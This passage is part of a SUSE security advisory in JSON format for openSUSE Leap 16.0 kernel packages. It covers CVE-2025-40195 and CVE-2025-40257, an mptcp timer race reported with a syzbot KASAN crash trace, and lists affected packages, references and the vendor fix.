"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40195"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
